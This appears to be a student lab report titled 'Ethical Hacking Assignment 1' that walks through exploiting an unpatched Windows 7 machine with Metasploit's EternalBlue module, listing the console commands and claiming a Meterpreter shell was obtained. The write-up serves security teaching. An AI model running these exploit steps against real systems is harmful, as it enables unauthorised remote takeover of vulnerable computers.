Professional Documents
Culture Documents
Ethical Hacking Assignment 1
Ethical Hacking Assignment 1
Abstract
Introduction
Microsoft introduced Windows 7 in 2009, but ended mainstream support for the
system in 2015.That's because it was making way for Windows 10 – also launched
in 2015.
Windows 7 has only received crucial security updates for the past four years. These
updates officially ended on January 14, 2020.
But there are users still using Windows 7 operating system. Hundreds of millions
of people will be affected as more than a third of PCs use Windows 7, according to
NetMarketShare.
Methodology
The first thing we need to do is open up the terminal and start Metasploit. Type
service postgresql start to initialize the PostgreSQL database, if it is not running
already, followed by msfconsole.
Next, use the search command within Metasploit to locate a suitable module to
use.
use exploit/windows/smb/ms17_010_eternalblue
We can take a look at the current settings with the options command.
Finally, set the listening host to the IP address of our local machine.
That should be everything, so the only thing left to do is launch the exploit. Use the
run command to fire it off.
run
We see a few things happen here, like the SMB connection being established and
the exploit packet being sent. At last, we see a "WIN" and a Meterpreter session is
opened. Sometimes, this exploit will not complete successfully the first time, so if
it doesn't just try again and it should go through.
Implementation
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
options
run
sysinfo
getuid
Result
Successfully hacked windows 7 PC. The shell is accessible in Kali Linux and could
rum multiple programs using EternalBlue exploit.
Findings
Reference
https://www.researchgate.net/
https://www.geeksforgeeks.org/
https://null-byte.wonderhowto.com/